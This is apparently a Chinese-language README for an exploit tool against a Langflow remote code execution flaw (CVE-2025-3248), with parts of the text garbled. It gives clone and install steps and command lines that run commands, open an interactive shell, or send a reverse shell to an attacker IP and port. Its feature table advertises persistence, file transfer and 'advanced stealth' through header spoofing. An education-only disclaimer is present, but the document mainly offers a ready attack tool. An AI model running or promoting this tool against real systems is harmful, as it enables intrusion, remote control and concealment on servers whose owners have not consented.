针对 Langflow 的远程代码执行漏洞利用(CVE-2025-3248) - [ By S4Tech ]
针对 Langflow 的远程代码执行漏洞利用 (CVE-2025-3248)
persist 命令)upload local_path remote_pathdownload remote_path local_pathclear 终端命令User-AgentX-Forwarded-For IPexploit_log.txt.langflow_shell_history)requestscoloramareadlinegit clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt
python exploit.py <URL> [options]
python exploit.py http://target.com
python exploit.py http://target.com --shell
python exploit.py http://target.com --command "whoami"
python exploit.py http://target.com --reverse 192.168.1.100 4444
Image.png)
âڑ ï¸ڈ 该工具仅供教育和授权测试目的使用。
âڑ ï¸ڈ 在未经拥有者许可或未获授权的情况下对系统进行未授权使用是违法的。
本项目采用 MIT 许可证授权 - 详见 LICENSE 文件。
欢迎提交 Pull Request。如需进行重大更改,请先开启一个 Issue 讨论您想更改的内容。
| 特性 | v1.0 | v2.0 |
|---|
| Payload 方法 | 1 | 5 |
| 文件传输 | ❌ 不支持 | ✅ 支持 |
| 持久化 | ❌ | ✅ |
| 隐蔽性级别 | 基础 | 高级 |
| 会话记录 | ❌ | ✅ |
| Option | Description |
|---|
--shell | 启动交互式 Shell |
--reverse IP PORT | 向指定 IP:PORT 发起反弹 Shell |
--command CMD | 执行单条命令 |
--verbose | 启用详细输出 |
--timeout SEC | 设置请求超时时间(默认:10秒) |